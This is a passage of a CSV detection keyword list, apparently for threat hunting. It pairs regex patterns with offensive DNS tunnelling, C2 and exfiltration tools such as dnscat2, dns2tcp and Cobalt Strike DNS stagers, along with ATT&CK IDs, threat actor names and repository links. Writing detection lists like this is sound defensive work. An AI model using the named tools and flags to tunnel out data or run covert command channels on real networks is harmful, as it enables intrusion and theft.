security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*dns_redir.sh *",".{0,1000}dns_redir\.sh\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*dns_server.py -d *",".{0,1000}dns_server\.py\s\-d\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - 
T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*dns_spoof.*",".{0,1000}dns_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns_stager_prepend*",".{0,1000}dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dns_stager_prepend*",".{0,1000}dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*'dns_stager_prepend'*",".{0,1000}\'dns_stager_prepend\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*dns_stager_subhost*",".{0,1000}dns_stager_subhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dns_stager_subhost*",".{0,1000}dns_stager_subhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*'dns_stager_subhost'*",".{0,1000}\'dns_stager_subhost\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*DNS_TXT_Pwnage.ps1*",".{0,1000}DNS_TXT_Pwnage\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*dns2tcp-*.zip*",".{0,1000}dns2tcp\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp.exe*",".{0,1000}dns2tcp\.exe.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp.hsc.fr*",".{0,1000}dns2tcp\.hsc\.fr.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp.kali.org*",".{0,1000}dns2tcp\.kali\.org.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp.pid*",".{0,1000}dns2tcp\.pid.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcpc -z 
*",".{0,1000}dns2tcpc\s\-z\s.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcpc.exe*",".{0,1000}dns2tcpc\.exe.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcpd --*",".{0,1000}dns2tcpd\s\-\-.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcpd -f *",".{0,1000}dns2tcpd\s\-f\s.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp-master*",".{0,1000}dns2tcp\-master.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dnsadmin_serverlevelplugindll.*",".{0,1000}dnsadmin_serverlevelplugindll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DNSAES256Handler.*",".{0,1000}DNSAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*dns-beacon *",".{0,1000}dns\-beacon\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*dns-black-cat-main*",".{0,1000}dns\-black\-cat\-main.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*DNS-C2 #>*",".{0,1000}DNS\-C2\s\#\>.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*dnscan-master*",".{0,1000}dnscan\-master.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*dnscat -*",".{0,1000}dnscat\s\-.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat 
tcpcat*",".{0,1000}dnscat\stcpcat.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat*",".{0,1000}dnscat.{0,1000}","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","N/A","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","N/A","N/A","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dns-cat.exe -*",".{0,1000}dns\-cat\.exe\s\-.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*dnscat2*.tar.bz2*",".{0,1000}dnscat2.{0,1000}\.tar\.bz2.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2-*.zip*",".{0,1000}dnscat2\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - 
TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2.*",".{0,1000}dnscat2\..{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2.ps1*",".{0,1000}dnscat2\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dnscat2/*",".{0,1000}dnscat2\/.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2-server*",".{0,1000}dnscat2\-server.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2-win32.exe*",".{0,1000}dnscat2\-win32\.exe.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - 
T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnschef --fakeip 127.0.0.1 -q*",".{0,1000}dnschef\s\-\-fakeip\s127\.0\.0\.1\s\-q.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dnschef.exe *",".{0,1000}dnschef\.exe\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*dnschef.logger*",".{0,1000}dnschef\.logger.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*dnschef.py *",".{0,1000}dnschef\.py\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*dnschef.utils*",".{0,1000}dnschef\.utils.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*dnschef-ng-main*",".{0,1000}dnschef\-ng\-main.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. 
A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*DNSCrypt client proxy*",".{0,1000}DNSCrypt\sclient\sproxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*DNSCrypt/dnscrypt-proxy*",".{0,1000}DNSCrypt\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-autoinstall*",".{0,1000}dnscrypt\-autoinstall.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy 
